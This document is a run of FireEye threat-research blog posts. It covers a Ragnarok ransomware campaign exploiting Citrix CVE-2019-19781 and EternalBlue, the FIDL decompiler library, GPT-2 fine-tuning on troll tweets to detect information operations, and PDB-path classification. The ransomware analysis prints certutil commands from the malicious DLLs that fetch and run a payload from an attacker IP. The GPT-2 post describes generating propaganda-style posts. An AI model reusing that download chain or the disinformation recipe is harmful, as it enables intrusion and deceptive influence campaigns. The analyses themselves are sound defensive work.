x64.dll               | 64-bit Downloader     | 55b40e0068429fbbb16f2113d6842ed2
scan.py               | Python socket scanner | b0acb27273563a5a2a5f71165606808c
xp_eternalblue.replay | Exploit replay file   | 6cf1857e569432fcfc8e506c8b0db635
eternalblue.replay    | Exploit replay file   | 9e408d947ceba27259e2a9a5c71a75a8

Table 1: Contents of the ZIP file ".new.zip", created by the script de.py

The contents of the ZIP were explained via analysis of the file scan.py, a Python scanning script that would also automate exploitation of identified vulnerable system(s). Our initial analysis showed that this script was a combination of functions from multiple open source projects or scripts. As one example, the replay files, which were either adapted or copied directly from this public GitHub repository, were present in the Install_Backdoor function, as shown in Figure 3:


Figure 3: Snippet of scan.py showing usage of EternalBlue replay files

This script also had multiple functions checking whether an identified system is 32- or 64-bit, as well as raw shellcode to step through an exploit. The exploit_main function, when called, would appropriately choose between 32- or 64-bit and select the right DLL for injection, as shown in Figure 4.


Figure 4: Snippet of scan.py showing instructions to deploy 32- or 64-bit downloaders

I Call Myself Ragnarok

Our analysis continued by examining the capabilities of the 32- and 64-bit DLLs, aptly named x86.dll and x64.dll. At only 5,120 bytes each, these binaries performed the following tasks (Figure 5 and Figure 6):

  1. Download a file named patch32 or patch64 (respective to operating system bit-ness) from a hard-coded URL using certutil, a native tool used as part of Windows Certificate Services (categorized as Technique T1105 within MITRE’s ATT&CK framework).
  2. Execute the downloaded binary since1969.exe, located in C:\Users\Public.
  3. Delete the URL from the current user’s certificate cache.
certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch32 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch32 delete

Figure 5: Snippet of strings from x86.dll

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch64 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch64 delete

Figure 6: Snippet of strings from x64.dll

Although neither patch32 nor patch64 was available at the time of analysis, FireEye identified a file on VirusTotal with the name avpass.exe (MD5: e345c861058a18510e7c4bb616e3fd9f) linked to the IP address 45[.]120[.]53[.]214 (Figure 7). This file is an instance of the publicly available Meterpreter backdoor that was uploaded on November 12, 2019. Additional analysis confirmed that this binary communicated to 45[.]120[.]53[.]214 over TCP port 1234.


Figure 7: VirusTotal graph showing links between resources hosted on or communicating with 45.120.53.214

Within the avpass.exe binary, we found an interesting PDB string that provided more context about the tool’s author: “C:\Users\ragnarok\source\repos\avpass\Debug\avpass.pdb”. Utilizing ragnarok as a keyword, we pivoted and were able to identify a separate copy of since1969.exe (MD5: 48452dd2506831d0b340e45b08799623) uploaded to VirusTotal on January 23, 2020. The binary’s compilation timestamp of January 16, 2020, aligns with our earliest detections associated with this threat actor.

Further analysis and sandboxing of this binary brought all the pieces together: this threat actor may have been attempting to deploy ransomware aptly named ‘Ragnarok’. We’d like to give credit to this Tweet from Karsten Hahn, who identified Ragnarok-related artifacts on January 17, 2020, again aligning with the timeframe of our initial detection. Figure 8 provides a snippet of files created by the binary upon execution.


Figure 8: Ragnarok-related ransomware files

The ransom note dropped by this ransomware, shown in Figure 9, points to three email addresses.

6.it's wise to pay as soon as possible it wont make you more losses

the ransome: 1 btcoin for per machine,5 bitcoins for all machines

how to buy bitcoin and transfer? i think you are very good at googlesearch

[email protected][.]com
[email protected][.]com
[email protected][.]com

Attention:if you wont pay the ransom in five days, all of your files will be made public on internet and will be deleted

Figure 9: Snippet of ransom note dropped by “since1969.exe”

Implications

FireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization. Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.

As previously mentioned, if you suspect your Citrix appliances may have been compromised, we recommend utilizing the tool FireEye released in partnership with Citrix.

Detect the Technique

Aside from CVE-2019-19781, FireEye detects the activity described in this post across our platforms, including named detections for Meterpreter and EternalBlue. Table 2 contains several specific detection names to assist in detection of this activity.

Signature Name

CERTUTIL.EXE DOWNLOADER (UTILITY)

CURL Downloading Shell Script

ETERNALBLUE EXPLOIT

METERPRETER (Backdoor)

METERPRETER URI (STAGER)

SMB - ETERNALBLUE

Table 2: FireEye Detections for activity described in this post

Indicators

Table 3 provides the unique indicators discussed in this post.

Indicator Type | Indicator                        | Notes
---------------|----------------------------------|------------------
Network        | 45[.]120[.]53[.]214              |
Network        | 198[.]44[.]227[.]126             |
Host           | 91dd06f49b09a2242d4085703599b7a7 | piz.Lan
Host           | 01af5ad23a282d0fd40597c1024307ca | de.py
Host           | bd977d9d2b68dd9b12a3878edd192319 | ld.sh
Host           | 0caf9be8fd7ba5b605b7a7b315ef17a0 | .new.zip
Host           | 9aa67d856e584b4eefc4791d2634476a | x86.dll
Host           | 55b40e0068429fbbb16f2113d6842ed2 | x64.dll
Host           | b0acb27273563a5a2a5f71165606808c | scan.py
Host           | 6cf1857e569432fcfc8e506c8b0db635 | xp_eternalblue.replay
Host           | 9e408d947ceba27259e2a9a5c71a75a8 | eternalblue.replay
Host           | e345c861058a18510e7c4bb616e3fd9f | avpass.exe
Host           | 48452dd2506831d0b340e45b08799623 | since1969.exe
Email Address  | [email protected][.]com          | From ransom note
Email Address  | [email protected][.]com          | From ransom note
Email Address  | [email protected][.]com          | From ransom note

Table 3: Collection of IOCs from this blog post

FIDL: FLARE’s IDA Decompiler Library

25 November 2019 at 20:00

IDA Pro and the Hex-Rays decompiler are a core part of any toolkit for reverse engineering and vulnerability research. In a previous blog post we discussed how the Hex-Rays API can be used to solve small, well-defined problems commonly seen as part of malware analysis. Having access to a higher-level representation of binary code makes the Hex-Rays decompiler a powerful tool for reverse engineering. However, interacting with the Hex-Rays API and its underlying data sources can be daunting, making the creation of generic analysis scripts difficult or tedious.

This blog post introduces the FLARE IDA Decompiler Library (FIDL), FireEye’s open source library which provides a wrapper layer around the Hex-Rays API.

Background

Output from the Hex-Rays decompiler is exposed to analysts via an Abstract Syntax Tree (AST). Out of the box, processing a binary using the Hex-Rays API means iterating this AST using a tree visitor class which visits each node in the tree and issues a callback.  For every callback we can check to see what kind of node we are visiting (calls, additions, assignments, etc.) and then process that node. For more information on these constructs see our previous blog post.
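
For the unfamiliar, a minimal visitor looks something like the following sketch, which simply counts the call expressions in the function under the cursor:

import idaapi

class call_counter_t(idaapi.ctree_visitor_t):
    def __init__(self):
        idaapi.ctree_visitor_t.__init__(self, idaapi.CV_FAST)
        self.n_calls = 0

    def visit_expr(self, expr):
        # Called once per expression node in the AST.
        if expr.op == idaapi.cot_call:
            self.n_calls += 1
        return 0  # returning zero continues the traversal

cfunc = idaapi.decompile(idaapi.get_screen_ea())
v = call_counter_t()
v.apply_to(cfunc.body, None)
print('%d call expressions' % v.n_calls)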

The Problem

While powerful, this workflow can be difficult to use when creating a generic API for several reasons:

  • The order in which nodes are visited is not always obvious from the decompiler output
  • When visiting a node, we have no context about where we are in the AST
  • Any problem which requires multiple steps requires multiple visitors or complicated logic in our callback function
  • The number of cases to handle when walking up or down the AST can increase exponentially

Handling each of these cases in a single visitor callback function is untenable, so we need a way to more flexibly interact with the decompiler.

FIDL

FIDL, the FLARE IDA Decompiler Library, is our implementation of a wrapper around the Hex-Rays API. FIDL’s main goal is to abstract away the lower level details of the default decompiler API. FIDL solves multiple problems:

  • Provides analysts an easy-to-understand API layer which can be used to write more complicated binary processing scripts
  • Abstracts away the minutiae of processing the AST
  • Provides helper implementations for commonly needed functionality when working with the decompiler
  • Provides documented examples on how to use various Hex-Rays APIs

Many of FIDL’s benefits are exposed to users via the controlFlowinator class. When constructing this object, FIDL parses the AST for us and provides a high-level summary of a function using information extracted via the decompiler, including APIs called, their parameters, and a summary of local variables and parameters for the function.
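
A typical interactive session looks roughly like the following; the module path and member names reflect our reading of the flare-ida repository, so consult its documentation for the authoritative API:

import idc
import FIDL.decompiler_utils as du

# Build the high-level summary for the function under the cursor.
c = du.controlFlowinator(ea=idc.get_screen_ea(), fast=False)

# Iterate the calls FIDL extracted, with resolved names and arguments.
for call in c.calls:
    print(call.name, call.args)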

Figure 1 shows a subset of information available via a controlFlowinator next to the decompilation of the function.


Figure 1: Sample output available as part of a controlFlowinator

When parsing the AST during construction, the controlFlowinator also combines nodes representing the same logical expression into a more digestible form where each block translates roughly to one line of pseudocode. Figure 2 and Figure 3 show the AST and controlFlowinator representations of the same function.


Figure 2: The default rendering of the AST of a function


Figure 3: The control flow graph created by the controlFlowinator for the function shown in Figure 2

Compared to the default AST, this graph is organized by potential code paths that can be taken through a function. This gives analysts a much more logical structure to iterate when trying to determine context for a particular expression.

Readily available access to variables and API calls used in a function makes creating scripts that leverage the Hex-Rays API much more straightforward. In our previous blog post we introduced a script which uses the Hex-Rays API to rename global variables based on the parameter to GetProcAddress. Figure 4 shows this script rewritten using the FIDL API. This new script is both easier to understand and does not rely on manually walking the AST.


Figure 4: Script that uses the FIDL API to map all calls to GetProcAddress to global variables

Rather than calling GetProcAddress, malware commonly resolves needed imports manually by walking the Export Address Table (EAT) and comparing the hashes of a DLL’s exports against pre-computed values. Being able to quickly or automatically map these functions to their intended APIs makes it easier for an analyst to identify which functions are worth spending time on. Figure 5 shows an example of how FIDL can be used to handle these cases. This script targets a DRIDEX sample with MD5 hash 7B82CF2CF9D08191C6828C3F62A2F914. This binary uses CRC32 with an XOR key of 0x65C54023 as the hashing algorithm during import resolution.


Figure 5: IDAPython script to automatically process and markup a DRIDEX sample

Running the above script results in output similar to what is shown in Figure 6, with comments labeling which functions are resolved.


Figure 6: The script in Figure 5 inserts comments into the decompiler output annotating the resolved functions
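
The hashing scheme itself is cheap to replicate outside of IDA. A sketch, assuming the checksum is a standard CRC32 of the ASCII export name XORed with the sample’s key:

import zlib

XOR_KEY = 0x65C54023

def dridex_hash(export_name):
    # CRC32 of the export name, XORed with the key, masked to 32 bits.
    return (zlib.crc32(export_name.encode('ascii')) ^ XOR_KEY) & 0xFFFFFFFF

# Precompute hashes for candidate APIs, then match them against the
# constants embedded in the sample.
lookup = {dridex_hash(n): n
          for n in ('LoadLibraryA', 'GetProcAddress', 'VirtualAlloc')}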

You can find FIDL in the FireEye GitHub repository.

Conclusion

While the Hex-Rays decompiler is a powerful source of information during reverse engineering, writing generic scripts and plugins using the default API is difficult and requires handling numerous edge cases. This post introduced the FIDL library, a wrapper around the Hex-Rays API, which addresses this by reducing the amount of low-level detail an analyst needs to understand in order to create a script leveraging the decompiler, and should make the creation of these scripts much faster. In future blog posts we will publish more scripts and analysis utilizing this library.

Attention is All They Need: Combatting Social Media Information Operations With Neural Language Models

14 November 2019 at 17:00

Information operations have flourished on social media in part because they can be conducted cheaply, are relatively low risk, have immediate global reach, and can exploit the type of viral amplification incentivized by platforms. Using networks of coordinated accounts, social media-driven information operations disseminate and amplify content designed to promote specific political narratives, manipulate public opinion, foment discord, or achieve strategic ideological or geopolitical objectives. FireEye’s recent public reporting illustrates the continually evolving use of social media as a vehicle for this activity, highlighting information operations supporting Iranian political interests such as one that leveraged a network of inauthentic news sites and social media accounts and another that impersonated real individuals and leveraged legitimate news outlets.

Identifying sophisticated activity of this nature often requires the subject matter expertise of human analysts. After all, such content is purposefully and convincingly manufactured to imitate authentic online activity, making it difficult for casual observers to properly verify. The actors behind such operations are not transparent about their affiliations, often undertaking concerted efforts to mask their origins through elaborate false personas and the adoption of other operational security measures. With these operations being intentionally designed to deceive humans, can we turn towards automation to help us understand and detect this growing threat? Can we make it easier for analysts to discover and investigate this activity despite the heterogeneity, high traffic, and sheer scale of social media?

In this blog post, we will illustrate an example of how the FireEye Data Science (FDS) team works together with FireEye’s Information Operations Analysis team to better understand and detect social media information operations using neural language models.

Highlights

  • A new breed of deep neural networks uses an attention mechanism to home in on patterns within text, allowing us to better analyze the linguistic fingerprints and semantic stylings of information operations using modern Transformer models.
  • By fine-tuning an open source Transformer known as GPT-2, we can detect social media posts being leveraged in information operations despite their syntactic differences to the model’s original training data.
  • Transfer learning from pre-trained neural language models lowers the barrier to entry for generating high-quality synthetic text at scale, and this has implications for the future of both red and blue team operations as such models become increasingly commoditized.

Background: Using GPT-2 for Transfer Learning

OpenAI’s updated Generative Pre-trained Transformer (GPT-2) is an open source deep neural network that was trained in an unsupervised manner on the causal language modeling task. The objective of this language modeling task is to predict the next word in a sentence from previous context, meaning that a trained model ends up being capable of language generation. If the model can predict the next word accurately, it can be used in turn to predict the following word, and so on until the model eventually produces fully coherent sentences and paragraphs. Figure 1 depicts an example of language model (LM) predictions we generated using GPT-2. To generate text, single words are successively sampled from distributions of candidate words predicted by the model until it predicts an <|endoftext|> word, which signals the end of the generation.


Figure 1: An example GPT-2 generation prior to fine-tuning after priming the model with the phrase “It’s disgraceful that.”  
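
Generations like the one in Figure 1 can be reproduced in a few lines with HuggingFace's transformers library; the prompt and sampling parameters below are illustrative, and 'gpt2-medium' is the 355 million parameter checkpoint referenced later in this post:

from transformers import GPT2LMHeadModel, GPT2Tokenizer

tokenizer = GPT2Tokenizer.from_pretrained('gpt2-medium')
model = GPT2LMHeadModel.from_pretrained('gpt2-medium')
model.eval()

# Prime the model, then sample one word at a time until it emits the
# <|endoftext|> token.
input_ids = tokenizer.encode("It's disgraceful that", return_tensors='pt')
output = model.generate(
    input_ids,
    do_sample=True,  # sample from the predicted word distribution
    max_length=100,
    top_k=40,
    eos_token_id=tokenizer.eos_token_id,
)
print(tokenizer.decode(output[0]))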

The quality of this synthetically generated text along with GPT-2’s state of the art accuracy on a host of other natural language processing (NLP) benchmark tasks is due in large part to the model’s improvements over prior 1) neural network architectures and 2) approaches to representing text. GPT-2 uses an attention mechanism to selectively focus the model on relevant pieces of text sequences and identify relationships between positionally distant words. In terms of architectures, Transformers use attention to decrease the time required to train on enormous datasets; they also tend to model lengthy text and scale better than other competing feedforward and recurrent neural networks. In terms of representing text, word embeddings were a popular way to initialize just the first layer of neural networks, but such shallow representations required being trained from scratch for each new NLP task and in order to deal with new vocabulary. GPT-2 instead pre-trains all the model’s layers using hierarchical representations, which better capture language semantics and are readily transferable to other NLP tasks and new vocabulary.

This transfer learning method is advantageous because it allows us to avoid starting from scratch for each and every new NLP task. In transfer learning, we start from a large generic model that has been pre-trained for an initial task where copious data is available. We then leverage the model’s acquired knowledge to train it further on a different, smaller dataset so that it excels at a subsequent, related task. This process of training the model further is referred to as fine-tuning, which involves re-learning portions of the model by adjusting its underlying parameters. Fine-tuning not only requires less data compared to training from scratch, but typically also requires less compute time and resources.

In this blog post, we will show how to perform transfer learning from a pre-trained GPT-2 model in order to better understand and detect information operations on social media. Transformers have shown that Attention is All You Need, but here we will also show that Attention is All They Need: while transfer learning may allow us to more easily detect information operations activity, it likewise lowers the barrier to entry for actors seeking to engage in this activity at scale.

Understanding Information Operations Activity Using Fine-Tuned Neural Generations

In order to study the thematic and linguistic characteristics of a common type of social media-driven information operations activity, we first fine-tuned an LM that could perform text generation. Since the pre-trained GPT-2 model's dataset consisted of 40+ GB of Internet text data extracted from 8+ million reputable web pages, its generations display relatively formal grammar, punctuation, and structure that corresponds to the text present within that original dataset (e.g. Figure 1). To make generations resemble social media posts, with their shorter length, informal grammar, erratic punctuation, and syntactic quirks including @mentions, #hashtags, emojis, acronyms, and abbreviations, we fine-tuned the pre-trained GPT-2 model on a new language modeling task using additional training data.

For the set of experiments presented in this blog post, this additional training data was obtained from the following open source datasets of identified accounts operated by Russia’s famed Internet Research Agency (IRA) “troll factory”:

  • NBCNews, over 200,000 tweets posted between 2014 and 2017 tied to IRA “malicious activity.”
  • FiveThirtyEight, over 1.8 million tweets associated with IRA activity between 2012 and 2018; we used accounts categorized as Left Troll, Right Troll, or Fearmonger.
  • Twitter Elections Integrity, almost 3 million tweets that were part of the influence effort by the IRA around the 2016 U.S. presidential election.
  • Reddit Suspicious Accounts, consisting of comments and submissions emanating from 944 accounts of suspected IRA origin.

After combining these four datasets, we sampled English-language social media posts from them to use as input for our fine-tuned LM. Fine-tuning experiments were carried out in PyTorch using the 355 million parameter pre-trained GPT-2 model from HuggingFace’s transformers library, and were distributed over up to 8 GPUs.

As opposed to other pre-trained LMs, GPT-2 conveniently requires minimal architectural changes and parameter updates in order to be fine-tuned on new downstream tasks. We simply processed social media posts from the above datasets through the pre-trained model, whose activations were then fed through adjustable weights into a linear output layer. The fine-tuning objective here was the same that GPT-2 was originally trained on (i.e. the language modeling task of predicting the next word, see Figure 1), except now its training dataset included text from social media posts. We also added the <|endoftext|> string as a suffix to each post to adapt the model to the shorter length of social media text, meaning posts were fed into the model according to:

“#Fukushima2015 Zaporozhia NPP can explode at any time
and that's awful! OMG! No way! #Nukraine<|endoftext|>”
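
In code, that preprocessing amounts to appending the marker and tokenizing each post for the LM objective (a sketch; the training loop and hyperparameters are omitted):

from transformers import GPT2Tokenizer

tokenizer = GPT2Tokenizer.from_pretrained('gpt2-medium')

def make_lm_example(post):
    # Suffix each post with the end-of-text marker so the model learns
    # where short social media posts stop.
    return tokenizer.encode(post + '<|endoftext|>')

ids = make_lm_example("#Fukushima2015 Zaporozhia NPP can explode at any time "
                      "and that's awful! OMG! No way! #Nukraine")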

Figure 2 depicts a few example generations made after fine-tuning GPT-2 on the IRA datasets. Observe how these text generations are formatted like something we might expect to encounter scrolling through social media – they are short yet biting, express certainty and outrage regarding political issues, and contain emphases like an exclamation point. They also contain idiosyncrasies like hashtags and emojis that positionally manifest at the end of the generated text, depicting a semantic style regularly exhibited by actual users.


Figure 2: Fine-tuning GPT-2 using the IRA datasets for the language modeling task. Example generations are primed with the same phrase from Figure 1, “It’s disgraceful that.” Hyphens are added for readability and not produced by the model.

How does the model produce such credible generations? Besides the weights that were adjusted during LM fine-tuning, some of the heavy lifting is also done by the underlying attention scores that were learned by GPT-2’s Transformer. Attention scores are computed between all words in a text sequence, and represent how important one word is when determining how important its nearby words will be in the next learning iteration. To compute attention scores, the Transformer performs a dot product between a Query vector q and a Key vector k:

  • q encodes the current hidden state, representing the word that searches for other words in the sequence to pay attention to that may help supply context for it.
  • k encodes the previous hidden states, representing the other words that receive attention from the query word and might contribute a better representation for it in its current context.

Figure 3 displays how this dot product is computed based on single neuron activations in q and k using an attention visualization tool called bertviz. Columns in Figure 3 trace the computation of attention scores from the highlighted word on the left, “America,” to the complete sequence of words on the right. For example, to decide to predict “#” following the word “America,” this part of the model focuses its attention on preceding words like “ban,” “Immigrants,” and “disgrace,” (note that the model has broken “Immigrants” into “Imm” and “igrants” because “Immigrants” is an uncommon word relative to its component word pieces within pre-trained GPT-2's original training dataset).  The element-wise product shows how individual elements in q and k contribute to the dot product, which encodes the relationship between each word and every other context-providing word as the network learns from new text sequences. The dot product is finally normalized by a softmax function that outputs attention scores to be fed into the next layer of the neural network.


Figure 3: The attention patterns for the query word highlighted in grey from one of the fine-tuned GPT-2 generations in Figure 2. Individual vertical bars represent neuron activations, horizontal bars represent vectors, and lines represent the strength of attention between words. Blue indicates positive values, red indicates negative values, and color intensity represents the magnitude of these values.
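
Numerically, each attention score is a dot product pushed through a softmax. A minimal PyTorch sketch with illustrative dimensions, including the sqrt(d_k) scaling Transformers conventionally apply, is:

import torch
import torch.nn.functional as F

d_k = 64                 # per-head hidden size (illustrative)
q = torch.randn(1, d_k)  # query: the word searching for context
k = torch.randn(7, d_k)  # keys: the preceding words

# Dot products between the query and every key, scaled, then
# normalized so the attention scores sum to one.
scores = F.softmax(q @ k.transpose(0, 1) / d_k ** 0.5, dim=-1)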

Syntactic relationships between words like “America,” “ban,” and “Immigrants“ are valuable from an analysis point of view because they can help identify an information operation’s interrelated keywords and phrases. These indicators can be used to pivot between suspect social media accounts based on shared lexical patterns, help identify common narratives, and even to perform more proactive threat hunting. While the above example only scratches the surface of this complex, 355 million parameter model, qualitatively visualizing attention to understand the information learned by Transformers can help provide analysts insights into linguistic patterns being deployed as part of broader information operations activity.

Detecting Information Operations Activity by Fine-Tuning GPT-2 for Classification

In order to further support FireEye Threat Analysts’ work in discovering and triaging information operations activity on social media, we next fine-tuned a detection model to perform classification. Just like when we adapted GPT-2 for a new language modeling task in the previous section, we did not need to make any drastic architectural changes or parameter updates to fine-tune the model for the classification task. However, we did need to provide the model with a labeled dataset, so we grouped together social media posts based on whether they were leveraged in information operations (class label CLS = 1) or were benign (CLS = 0).

Benign, English-language posts were gathered from verified social media accounts, which generally corresponded to public figures and other prominent individuals or organizations whose posts contained diverse, innocuous content. For the purposes of this blog post, information operations-related posts were obtained from the previously mentioned open source IRA datasets. For the classification task, we separated the IRA datasets that were previously combined for LM fine-tuning, and selected posts from only one of them for the group associated with CLS = 1. To perform dataset selection quantitatively, we fine-tuned LMs on each IRA dataset to produce three different LMs while keeping 33% of the posts from each dataset held out as test data. Doing so allowed us to quantify the overlap between the individual IRA datasets based on how well one dataset’s LM was able to predict post content originating from the other datasets.


Figure 4: Confusion matrix representing perplexities of the LMs on their test datasets. The LM corresponding to the GPT-2 row was not fine-tuned; it corresponds to the pretrained GPT-2 model with reported perplexity of 18.3 on its own test set, which was unavailable for evaluation using the LMs. The Reddit dataset was excluded due to the low volume of samples.

In Figure 4, we show the result of computing perplexity scores for each of the three LMs and the original pre-trained GPT-2 model on held out test data from each dataset. Perplexity captures how well a model predicts the correct next word, so lower scores indicate a better fit. The lowest scores fell along the main diagonal of the perplexity confusion matrix, meaning that the fine-tuned LMs were best at predicting the next word on test data originating from within their own datasets. The LM fine-tuned on Twitter’s Elections Integrity dataset displayed the lowest perplexity scores when averaged across all held out test datasets, so we selected posts sampled from this dataset to demonstrate classification fine-tuning.
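
For reference, the perplexity of an LM on a held out set of posts is the exponentiated average per-token negative log-likelihood. A minimal sketch using the Hugging Face transformers API for illustration (our fine-tuning pipeline differed in its details, and the per-sequence token weighting below is approximate):

import math
import torch
from transformers import GPT2LMHeadModel, GPT2TokenizerFast

def perplexity(model, tokenizer, texts, device="cpu"):
    model.eval()
    total_nll, total_tokens = 0.0, 0
    with torch.no_grad():
        for text in texts:
            ids = tokenizer(text, return_tensors="pt").input_ids.to(device)
            # Passing labels=ids makes the model return the mean next-token
            # cross-entropy for this sequence.
            loss = model(ids, labels=ids).loss
            total_nll += loss.item() * ids.size(1)
            total_tokens += ids.size(1)
    return math.exp(total_nll / total_tokens)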


Figure 5: (A) Training loss histories during GPT-2 fine-tuning for the classification (red) and LM (grey, inset) tasks. (B) ROC curve (red) evaluated on the held out fine-tuning test set, contrasted with random guess (grey dotted).

To fine-tune for the classification task, we once again processed the selected dataset’s posts through the pre-trained GPT-2 model. This time, activations were fed through adjustable weights into two linear output layers instead of just the single one used for the language modeling task in the previous section. Here, fine-tuning was formulated as a multi-task objective with classification loss together with an auxiliary LM loss, which helped accelerate convergence during training and improved the generalization of the model. We also prepended posts with a new [BOS] (i.e. Beginning Of Sentence) string and suffixed posts with the previously mentioned [CLS] class label string, so that each post was fed into the model according to:

“[BOS]Kevin Mandia was on @CNBC’s @MadMoneyOnCNBC with @jimcramer discussing targeted disinformation heading into the… https://t.co/l2xKQJsuwk[CLS]”

The [BOS] string played a similar delimiting role to the <|endoftext|> string used previously in LM fine-tuning, while the hidden state corresponding to the [CLS] string was fed into the model’s classification layer, which predicted the label ∈ {0, 1}. The example social media post above came from the benign dataset, so this sample’s label was set to CLS = 0 during fine-tuning. Figure 5A shows the evolution of classification and auxiliary LM losses during fine-tuning, and Figure 5B displays the ROC curve for the fine-tuned classifier on its test set consisting of around 66,000 social media posts. The convergence of the losses to low values, together with a high Area Under the ROC Curve (i.e. AUC), illustrates that transfer learning allowed this model to accurately distinguish social media posts associated with IRA information operations activity from benign ones. Taken together, these metrics indicate that the fine-tuned classifier should generalize well to newly ingested social media posts, providing analysts a capability they can use to separate signal from noise.
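
A minimal sketch of the multi-task objective described above – the names, and the weighting coefficient in particular, are illustrative assumptions rather than our exact training code:

import torch.nn.functional as F

def multitask_loss(lm_logits, lm_labels, clf_logits, clf_labels, lm_coef=0.5):
    # Classification loss from the linear head reading the [CLS] hidden state,
    # plus a weighted auxiliary language modeling loss over the sequence.
    lm_loss = F.cross_entropy(lm_logits.view(-1, lm_logits.size(-1)),
                              lm_labels.view(-1))
    clf_loss = F.cross_entropy(clf_logits, clf_labels)
    return clf_loss + lm_coef * lm_loss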

Conclusion

In this blog post, we demonstrated how to fine-tune a neural LM on open source datasets containing social media posts previously leveraged in information operations. Transfer learning allowed us to classify these posts with a high AUC score, and FireEye’s Threat Analysts can utilize this detection capability in order to discover and triage similar emergent operations. Additionally, we showed how Transformer models assign scores to different pieces of text via an attention mechanism. This visualization can be used by analysts to tease apart adversary tradecraft based on posts’ linguistic fingerprints and semantic stylings.

Transfer learning also allowed us to generate credible synthetic text with low perplexity scores. One of the barriers actors face when devising effective information operations is adequately capturing the nuances and context of the cultural climate in which their targets are situated. Our exercise here suggests this costly step could be bypassed using pre-trained LMs, whose generations can be fine-tuned to embody the zeitgeist of social media. GPT-2’s authors and subsequent researchers have warned about potential malicious use cases enabled by this powerful natural language generation technology, and while our research was conducted for a defensive application in a controlled offline setting using readily available open source data, it reinforces this concern. As trends towards more powerful and readily available language generation models continue, it is important to redouble efforts towards detection as demonstrated by Figure 5 and other promising approaches such as Grover.

This research was conducted during a three-month FireEye IGNITE University Program summer internship, and represents a collaboration between the FDS and FireEye Threat Intelligence’s Information Operations Analysis teams. If you are interested in working on multidisciplinary projects at the intersection of cyber security and machine learning, please consider applying to one of our 2020 summer internships.

Definitive Dossier of Devilish Debug Details – Part Deux: A Didactic Deep Dive into Data Driven Deductions

17 October 2019 at 15:30

In Part One of this blog series, Steve Miller outlined what PDB paths are, how they appear in malware, how we use them to detect malicious files, and how we sometimes use them to make associations about groups and actors.

As Steve continued his research into PDB paths, we became interested in applying more general statistical analysis. The PDB path as an artifact poses an intriguing use case for a couple of reasons.

First, the PDB artifact is not directly tied to the functionality of the binary. As a byproduct of the compilation process, it contains information about the development environment, and by proxy, the malware author themselves. Rarely do we encounter static malware features with such an interesting tie to the human behind the keyboard, rather than the functionality of the file.

Second, file paths are an incredibly complex artifact with many different possible encodings. We had personally been dying to find an excuse to spend more time figuring out how to parse and encode paths in a more useful way. This presented an opportunity to dive into this space and test different approaches to representing file paths in various models.

The objectives of our project were:

  1. Build a large data set of PDB paths and apply some statistical methods to find potentially new signature terms and logic.
  2. Investigate whether applying machine learning classification approaches to this problem could improve our detection above writing hand-crafted signatures.
  3. Build a PDB classifier as a weak signal for binary analysis.

To start, we began gathering data. Our dataset, pulled from internal and external sources, started with over 200,000 samples. Once we deduplicated by PDB path, we had around 50,000 samples. Next, we needed to consistently label these samples, so we considered various labeling schemes.

Labeling Binaries With PDB Paths

For many of the binaries we had internal FireEye labels, and for others we looked up hashes on VirusTotal (VT) to have a look at their detection rates. This covered the majority of our samples. For a relatively small subset we had disagreements between our internal engine and VT results, which merited a slightly more nuanced policy. The disagreement was most often that our internal assessment determined a file to be benign, but the VT results showed a nonzero percentage of vendors detecting the file as malicious. In these cases we plotted the “VT ratio”: that is, the percentage of vendors labeling the files as malicious (Figure 1).


Figure 1: Ratio of vendors calling file bad/total number of vendors

The vast majority of these samples had VT detection ratios below 0.3, and in those cases we labeled the binaries as benign. For the remainder of samples we tried two strategies – marking them all as malicious, or removing them from the training set entirely. Our classification performance did not change much between these two policies, so in the end we scrapped the remainder of the samples to reduce label noise.

Building Features

Next, we had to start building features. This is where the fun began. Looking at dozens and dozens of PDB paths, we simply started recording various things that ‘pop out’ to an analyst. As noted earlier, a file path contains tons of implicit information, beyond simply being a string-based artifact. Some analogies we have found useful are that a file path is akin to a geographical location in its representation of a location on the file system, or like a sentence in that it reflects a series of dependent items.

To further illustrate this point, consider a simple file path such as:

C:\Users\World\Desktop\duck\Zbw138ht2aeja2.pdb (source file)

This path tells us several things:

  • This software was compiled on the system drive of the computer
  • In a user profile, under user ‘World’
  • The project is managed on the Desktop, in a folder called ‘duck’
  • The filename has a high degree of entropy and is not very easy to remember

In contrast, consider something such as:

D:\VSCORE5\BUILD\VSCore\release\EntVUtil.pdb (source file)

This indicates:

  • Compilation on an external or secondary drive
  • Within a non-user directory
  • Contains development terms such as ‘BUILD’ and ‘release’
  • With a sensible, semi-memorable file name

These differences seem relatively straightforward and make intuitive sense as to why one might be representative of malware development whereas the other represents a more “legitimate-looking” development environment.

Feature Representations

How do we represent these differences to a model? The easiest and most obvious option is to calculate some statistics on each path. Features such as folder depth, path length, entropy, and counting things such as numbers, letters, and special characters in the PDB filename are easy to compute.
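
A minimal sketch of these statistical features, assuming simple character-level heuristics (the exact feature functions we used differed in their details):

import math
from collections import Counter

def shannon_entropy(s):
    counts = Counter(s)
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())

def path_stats(pdb_path):
    # Simple statistics computed over a raw PDB path and its filename.
    filename = pdb_path.split("\\")[-1]
    return {
        "folder_depth": pdb_path.count("\\"),
        "path_length": len(pdb_path),
        "path_entropy": shannon_entropy(pdb_path),
        "filename_digits": sum(c.isdigit() for c in filename),
        "filename_letters": sum(c.isalpha() for c in filename),
        "filename_specials": sum(not c.isalnum() for c in filename),
    }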

However, upon evaluation against our dataset, these features did not help to separate the classes very well. The following are some graphics detailing the distributions of these features between our classes of malicious and benign samples:

While there is potentially some separation between benign and malicious distributions, these features alone would likely not lead to an effective classifier (we tried). Additionally, we couldn’t easily translate these differences into explicit detection rules. There was more information in the paths that we needed to extract, so we began to look at how to encode the directory names themselves.

Normalization

As with any dataset, we had to undertake some steps to normalize the paths. For example, the occurrence of individual usernames, while perhaps interesting from an intelligence perspective, would be represented as distinct entities when in fact they have the same semantic meaning. Thus, we had to detect and replace usernames with <username> to normalize this representation. Other folder idiosyncrasies such as version numbers or randomly generated directories could similarly be normalized into <version> or <random>.

A typical normalized path might therefore go from this:

